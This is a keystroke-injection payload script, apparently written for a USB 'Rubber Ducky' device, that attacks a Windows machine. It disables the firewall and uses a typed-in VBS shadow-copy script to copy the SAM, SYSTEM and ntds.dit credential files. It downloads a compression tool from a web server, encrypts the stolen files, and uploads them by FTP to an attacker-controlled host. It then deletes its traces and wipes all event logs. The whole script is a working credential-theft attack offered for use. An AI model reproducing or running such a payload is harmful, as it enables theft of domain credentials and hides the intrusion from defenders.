ESCAPE
DELAY 400
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
MENU
DELAY 400
STRING a
DELAY 400
ENTER
DELAY 800
ALT SPACE
DELAY 300
STRING M
DELAY 200
DOWNARROW
REPEAT 100
ENTER
ENTER
STRING cd %USERPROFILE%
ENTER
STRING netsh firewall set opmode disable
ENTER
DELAY 300
STRING copy con vssown.vbs
ENTER
STRING Set args = WScript.Arguments
ENTER
STRING strComputer = "."
ENTER
STRING Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
ENTER 
STRING Select Case args.Item(0)
ENTER 
STRING   Case "/start"
ENTER
STRING     Set colListOfServices = objWMIService.ExecQuery("Select * from Win32_Service Where Name ='VSS'")
ENTER
STRING     For Each objService in colListOfServices
ENTER
STRING       objService.StartService()
ENTER
STRING       Wscript.Echo "[*] Signal sent to start the " & objService.Name & " service."
ENTER
STRING     Next
ENTER
STRING     wscript.Quit(0)
ENTER 
STRING   Case "/stop"
ENTER
STRING     Set colListOfServices = objWMIService.ExecQuery("Select * from Win32_Service Where Name ='VSS'")
ENTER
STRING     For Each objService in colListOfServices
ENTER
STRING       objService.StopService()
ENTER
STRING       Wscript.Echo "[*] Signal sent to stop the " & objService.Name & " service."
ENTER
STRING     Next
ENTER
STRING     wscript.Quit(0) 
ENTER 
STRING   Case "/create"
ENTER
STRING     VOLUME = args.Item(1) & ":\"
ENTER
STRING     Const CONTEXT = "ClientAccessible"
ENTER
STRING     Set objShadowStorage = objWMIService.Get("Win32_ShadowCopy")
ENTER
STRING     Wscript.Echo "[*] Attempting to create a shadow copy."
ENTER
STRING     errResult = objShadowStorage.Create(VOLUME, CONTEXT, strShadowID)
ENTER
STRING     wscript.Quit(errResult)
ENTER
STRING End Select
ENTER
CTRL z
ENTER
STRING cscript vssown.vbs /start
ENTER
STRING cscript vssown.vbs /create c
ENTER
DELAY 1000
STRING cscript vssown.vbs /create c
ENTER
DELAY 1000
STRING cscript vssown.vbs /create c
ENTER
DELAY 1000
STRING cscript vssown.vbs /create c
ENTER
DELAY 1000
STRING cscript vssown.vbs /create c
ENTER
DELAY 1000
STRING cscript vssown.vbs /create c
ENTER
DELAY 1000
STRING cscript vssown.vbs /create c
ENTER
DELAY 1000
STRING cscript vssown.vbs /create c
ENTER
DELAY 1000
STRING cscript vssown.vbs /create c
ENTER
DELAY 1000
STRING cscript vssown.vbs /create c
ENTER
DELAY 1000
STRING copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy10\windows\system32\config\SYSTEM .
ENTER
STRING copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy10\windows\system32\config\SAM .
ENTER
STRING copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy10\windows\ntds\ntds.dit .
ENTER
DELAY 1000
STRING cscript vssown.vbs /stop
ENTER
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://webserverip/7za.exe','%USERPROFILE%\7za.exe')
ENTER
DELAY 2000
STRING 7za a -y -tzip -mem=AES256 -pzippassword ntds.zip ntds.dit
ENTER
DELAY 800
STRING 7za a -y -tzip -mem=AES256 -pzippassword SAM.zip SAM
ENTER
DELAY 800 
STRING 7za a -y -tzip -mem=AES256 -pzippassword SYSTEM.zip SYSTEM
ENTER
DELAY 2000
STRING ftp
ENTER
DELAY 500
STRING open attackerftp
ENTER
DELAY 800
STRING attackerusername
ENTER
DELAY 1000
STRING attackerpassword
ENTER
DELAY 1000
STRING bin
ENTER
DELAY 800
STRING put SAM.zip
ENTER
DELAY 800
STRING put SYSTEM.zip
ENTER
STRING put ntds.zip
ENTER
DELAY 800
STRING quit
ENTER
DELAY 200
STRING DEL SAM
ENTER
STRING DEL SYSTEM
ENTER
STRING DEL ntds.dit
ENTER
STRING DEL SAM.zip
ENTER
STRING DEL SYSTEM.zip
ENTER
STRING DEL ntds.zip
ENTER
STRING DEL 7za.exe
ENTER
STRING DEL vssown.vbs
ENTER
STRING for /f %x in ('wevtutil el') do wevtutil cl "%x"
ENTER
DELAY 5000
STRING exit
ENTER
